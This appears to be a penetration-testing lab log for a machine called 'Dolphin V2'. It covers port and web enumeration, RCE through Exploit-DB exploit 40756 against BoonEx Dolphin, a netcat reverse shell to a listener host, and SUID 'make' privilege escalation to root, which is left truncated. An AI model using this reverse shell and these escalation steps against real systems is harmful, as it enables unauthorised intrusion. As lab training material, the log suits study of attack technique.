Dolphin V2
๐งช Pentest Log: {{date:2025-08-26}}
๐ Target Information
- Machine Name: Dolphin V2
- IP Address: 10.11.1.58
- Operating System: Linux
ip=10.11.1.58
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
wpscan --url http://$ip
Google "BoonEx dolphin exploit exploitdb", found
https://www.exploit-db.com/exploits/40756
Port 81
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/40756
python2 40756.py http://$ip/
shell
busybox nc 172.16.1.2 80 -e /bin/bash
python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80
๐งฌ Privilege Escalation
๐ค Current Access
- User: www-data
- Groups: 33(www-data)
- Shell Type: reverse shell
๐ Enumeration
SUID Files
find / -type f -perm -4000 2>/dev/null
found
/usr/bin/make
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: SUID Abuse
- Target Binary/Service: make
- Reference / Source: GTFOBins
๐ง Exploit Steps
- Setup
COMMAND='/bin/sh -p'
- Smash to root
make -s --eval=
- Key file
hjf9dhjd31djasd328rh
- Key file